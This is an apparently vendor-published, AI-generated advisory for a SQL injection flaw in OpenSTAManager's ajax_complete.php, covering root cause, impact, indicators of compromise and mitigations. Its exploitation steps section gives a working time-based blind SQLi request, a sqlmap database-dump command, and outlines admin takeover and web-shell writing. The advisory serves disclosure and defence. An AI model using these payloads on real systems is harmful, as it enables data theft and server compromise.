CVE-2025-69213: 
PHP vulnerability analysis and mitigation

Overview

CVE-2025-69213 is a SQL Injection vulnerability in OpenSTAManager's ajax_complete.php endpoint affecting the get_sedi operation. It was discovered by Łukasz Rybak and published on February 3, 2026, affecting all versions of OpenSTAManager up to and including 2.9.8 (devcode-it/openstamanager). An authenticated attacker can inject malicious SQL via the idanagrafica GET parameter, leading to unauthorized database access. The vulnerability carries a CVSS v4 base score of 8.7 (High) and a CVSS v3.1 base score of 8.8 (High) (GitHub Advisory, OSM Advisory).

Technical details

The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command), arising from direct string concatenation of unsanitized user input into a SQL query. In modules/anagrafiche/ajax/complete.php (line 28), the get_sedi case retrieves $_GET['idanagrafica'] via get('idanagrafica') and concatenates it directly into a SELECT query: WHERE idanagrafica='".$idanagrafica."'. The sink $dbo->fetchArray($q) then executes the malicious query without any parameterization or escaping. Exploitation requires only a valid authenticated session (low-privilege user) and is performed over the network with no user interaction, using time-based blind SQL injection techniques (GitHub Advisory, OSM Advisory).

Impact

Successful exploitation enables complete database extraction, including user credentials, customer data, and financial records. An attacker can escalate privileges by modifying the zz_users table to gain administrative access, and can also perform unauthorized modification or deletion of database records, compromising data integrity. If MySQL file permissions allow, the vulnerability could be leveraged for Remote Code Execution via SELECT ... INTO OUTFILE, potentially enabling full server compromise (GitHub Advisory, OSM Advisory).

Exploitability

Proof-of-concept exploit code is publicly available in the GitHub Security Advisory, including both a manual time-based blind SQLi payload and a sqlmap command for automated exploitation. As of the time of publication, there is no confirmed evidence of in-the-wild exploitation. The EPSS score is approximately 0.058% (19th percentile), indicating a currently low but non-negligible probability of exploitation. The vulnerability is not listed in the CISA KEV catalog, and no specific threat actor attribution has been reported (GitHub Advisory, OSM Advisory).

Exploitation steps

  1. Authenticate: Obtain a valid low-privilege user session on the target OpenSTAManager instance (version ≤ 2.9.8) and capture the PHPSESSID cookie.
  2. Identify the vulnerable endpoint: Confirm the ajax_complete.php endpoint is accessible at http://<target>/ajax_complete.php?op=get_sedi&idanagrafica=1.
  3. Verify injection with time-based blind SQLi: Send the following crafted request to confirm the vulnerability by observing a ~5-second response delay:
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session_cookie>
  1. Automate extraction with sqlmap: Use sqlmap to dump the full database:
sqlmap -u "http://<target>/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session_cookie>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump
  1. Escalate privileges: Extract credentials or directly modify the zz_users table to grant the attacker's account administrative privileges within OpenSTAManager.
  2. Attempt RCE (if file permissions allow): Use SELECT ... INTO OUTFILE to write a PHP web shell to a web-accessible directory for remote code execution (GitHub Advisory, OSM Advisory).

Indicators of compromise

  • Network: Unusual GET requests to /ajax_complete.php with op=get_sedi and idanagrafica values containing SQL keywords such as SLEEP, SELECT, UNION, AND, --, or URL-encoded equivalents; repeated requests with varying idanagrafica values suggesting automated enumeration.
  • Logs: Web server access logs showing requests to ajax_complete.php?op=get_sedi with anomalous or lengthy idanagrafica parameter values; MySQL slow query logs showing repeated SLEEP() calls or unexpected SELECT ... INTO OUTFILE statements.
  • File System: Unexpected PHP files (web shells) written to web-accessible directories by the MySQL process user, particularly files with names like shell.php, cmd.php, or random strings.
  • Database: Unauthorized changes to the zz_users table, such as new admin accounts or modified privilege fields; unexpected data exports or large result sets in query logs (GitHub Advisory, OSM Advisory).

Mitigation and workarounds

As of the advisory publication date, no official patched version of OpenSTAManager has been released — all versions up to and including 2.9.8 are affected. The recommended remediation is to replace direct SQL string concatenation with parameterized prepared statements in modules/anagrafiche/ajax/complete.php. As interim workarounds: restrict network access to the ajax_complete.php endpoint via firewall or web server rules; apply the principle of least privilege to database accounts used by OpenSTAManager; and deploy a Web Application Firewall (WAF) to detect and block SQL injection patterns targeting the idanagrafica parameter. Monitor the OpenSTAManager repository for patch releases and apply them immediately when available (GitHub Advisory, OSM Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management